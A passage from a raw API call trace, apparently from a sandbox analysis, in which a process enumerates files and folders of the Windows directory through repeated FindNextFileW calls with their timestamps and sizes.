nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PCHEALTH", cAlternateFileName="")) returned 1 [0246.642] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80046d91, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80046d91, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Performance", cAlternateFileName="PERFOR~1")) returned 1 [0246.643] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4e1cc01, ftCreationTime.dwHighDateTime=0x1cb892e, ftLastAccessTime.dwLowDateTime=0xc4e1cc01, ftLastAccessTime.dwHighDateTime=0x1cb892e, ftLastWriteTime.dwLowDateTime=0x78374e00, ftLastWriteTime.dwHighDateTime=0x1d30596, nFileSizeHigh=0x0, nFileSizeLow=0x69ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="PFRO.log", cAlternateFileName="")) returned 1 [0246.643] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfea8540c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfeaf781a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfeaf781a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PLA", cAlternateFileName="")) returned 1 [0246.643] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfeb1d974, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x94d2e7b9, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x94d2e7b9, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PolicyDefinitions", cAlternateFileName="POLICY~1")) returned 1 [0246.643] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6240bc00, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x60bd470, ftLastAccessTime.dwHighDateTime=0x1d6f0d1, ftLastWriteTime.dwLowDateTime=0x60bd470, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prefetch", cAlternateFileName="")) returned 1 [0246.643] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf9a5c4e, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaf9cbebd, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x5b155ccd, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xd12f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Professional.xml", cAlternateFileName="PROFES~1.XML")) returned 1 [0246.643] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71a7c91c, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0x71a7c91c, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0xedf95f70, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x68400, dwReserved0=0x0, dwReserved1=0x0, cFileName="regedit.exe", cAlternateFileName="")) returned 1 [0246.644] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfeb43ace, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xff1f57a0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xff1f57a0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Registration", cAlternateFileName="REGIST~1")) returned 1 [0246.644] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfeb69c28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b041c20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2b041c20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rescache", cAlternateFileName="")) returned 1 [0246.644] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfeb8fd82, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80046d91, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80046d91, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0246.644] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfebb5edc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfebb5edc, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xcb547a92, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SchCache", cAlternateFileName="")) returned 1 [0246.644] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfebdc036, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80046d91, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80046d91, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="schemas", cAlternateFileName="")) returned 1 [0246.644] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec02190, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98abb4cc, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x98abb4cc, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="security", cAlternateFileName="")) returned 1 [0246.645] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf484ebfa, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf4be0d01, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xf4be0d01, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ServiceProfiles", cAlternateFileName="SERVIC~2")) returned 1 [0246.645] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec4e444, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea1accb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="servicing", cAlternateFileName="SERVIC~1")) returned 1 [0246.645] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf627de2b, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf62a3f8b, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xf62a3f8b, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup", cAlternateFileName="")) returned 1 [0246.645] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fb4a840, ftCreationTime.dwHighDateTime=0x1d4d57d, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0xb0760260, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x102, dwReserved0=0x0, dwReserved1=0x0, cFileName="setupact.log", cAlternateFileName="")) returned 1 [0246.645] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fb4a840, ftCreationTime.dwHighDateTime=0x1d4d57d, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="setuperr.log", cAlternateFileName="")) returned 1 [0246.646] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9968150d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaf52ba40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf52ba40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShellNew", cAlternateFileName="")) returned 1 [0246.646] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x145b2540, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2cafb6a0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x2cafb6a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoftwareDistribution", cAlternateFileName="SOFTWA~1")) returned 1 [0246.646] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec7459e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d9da406, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d9da406, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Speech", cAlternateFileName="")) returned 1 [0246.646] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x936ee880, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x936ee880, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x936ee880, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10600, dwReserved0=0x0, dwReserved1=0x0, cFileName="splwow64.exe", cAlternateFileName="")) returned 1 [0246.646] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0aa2eb0, ftCreationTime.dwHighDateTime=0x1ca0443, ftLastAccessTime.dwLowDateTime=0xf0aa2eb0, ftLastAccessTime.dwHighDateTime=0x1ca0443, ftLastWriteTime.dwLowDateTime=0x5f19ab6d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xbc49, dwReserved0=0x0, dwReserved1=0x0, cFileName="Starter.xml", cAlternateFileName="")) returned 1 [0246.646] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec7459e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfec7459e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xf404c84a, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="system", cAlternateFileName="")) returned 1 [0246.647] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadc7ce10, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xadc7ce10, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x8bb1d8db, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="system.ini", cAlternateFileName="")) returned 1 [0246.647] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x595bf470, ftLastAccessTime.dwHighDateTime=0x1d6f0d1, ftLastWriteTime.dwLowDateTime=0x595bf470, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 1 [0246.647] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SysWOW64", cAlternateFileName="")) returned 1 [0246.647] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12b00f8, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x8d561533, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x8d561533, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TAPI", cAlternateFileName="")) returned 1 [0246.647] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12b00f8, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xe3cd110, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xe3cd110, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tasks", cAlternateFileName="")) returned 1 [0246.647] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d6252, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xd7782780, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd7782780, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0246.648] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d6252, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x12d6252, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x9f16e414, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tracing", cAlternateFileName="")) returned 1 [0246.648] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7986cda0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x7986cda0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x7986cda0, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0x54b, dwReserved0=0x0, dwReserved1=0x0, cFileName="TSSysprep.log", cAlternateFileName="TSSYSP~1.LOG")) returned 1 [0246.648] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f64321c, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0x2f64321c, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0x2f64321c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x17240, dwReserved0=0x0, dwReserved1=0x0, cFileName="twain.dll", cAlternateFileName="")) returned 1 [0246.648] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800b91b1, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80cc6128, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80cc6128, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="twain_32", cAlternateFileName="")) returned 1 [0246.648] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3bc54f7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3bc54f7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3bc54f7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xc800, dwReserved0=0x0, dwReserved1=0x0, cFileName="twain_32.dll", cAlternateFileName="")) returned 1 [0246.648] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5193c78, ftCreationTime.dwHighDateTime=0x1ca040b, ftLastAccessTime.dwLowDateTime=0xe5193c78, ftLastAccessTime.dwHighDateTime=0x1ca040b, ftLastWriteTime.dwLowDateTime=0x2f66937c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xc210, dwReserved0=0x0, dwReserved1=0x0, cFileName="twunk_16.exe", cAlternateFileName="")) returned 1 [0246.649] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x149c5632, ftCreationTime.dwHighDateTime=0x1ca0418, ftLastAccessTime.dwLowDateTime=0x149c5632, ftLastAccessTime.dwHighDateTime=0x1ca0418, ftLastWriteTime.dwLowDateTime=0x77d4a690, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x7a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="twunk_32.exe", cAlternateFileName="")) returned 1 [0246.649] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89a56640, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x89a56640, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xf1490400, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x27, dwReserved0=0x0, dwReserved1=0x0, cFileName="vbaddin.ini", cAlternateFileName="")) returned 1 [0246.649] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d6252, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x12d6252, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x12d6252, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vss", cAlternateFileName="")) returned 1 [0246.649] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fc3ac, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x80046d91, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80046d91, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web", cAlternateFileName="")) returned 1 [0246.649] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadc7ce10, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xadc7ce10, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x249a330, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x1de, dwReserved0=0x0, dwReserved1=0x0, cFileName="win.ini", cAlternateFileName="")) returned 1 [0246.649] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x2870a176, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2870a176, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28b347fe, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x2ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsShell.Manifest", cAlternateFileName="WINDOW~1.MAN")) returned 1 [0246.650] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14519fc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x14519fc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2c655760, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x1e51f, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate.log", cAlternateFileName="WINDOW~1.LOG")) returned 1 [0246.650] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc68ade7e, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xc68ade7e, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x795b1f80, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="winhlp32.exe", cAlternateFileName="")) returned 1 [0246.650] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fc3ac, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xbbbe9b70, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xbbbe9b70, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="winsxs", cAlternateFileName="")) returned 1 [0246.650] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67827cf3, ftCreationTime.dwHighDateTime=0x1c9ea0d, ftLastAccessTime.dwLowDateTime=0x67827cf3, ftLastAccessTime.dwHighDateTime=0x1c9ea0d, ftLastWriteTime.dwLowDateTime=0x6784de51, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x4d4e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMSysPr9.prx", cAlternateFileName="")) returned 1 [0246.650] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89802aba, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x89802aba, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xfeb14f80, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="write.exe", cAlternateFileName="")) returned 1 [0246.650] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89802aba, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x89802aba, ftLastAccessTime.dwHighDateTime=0x1ca0415, 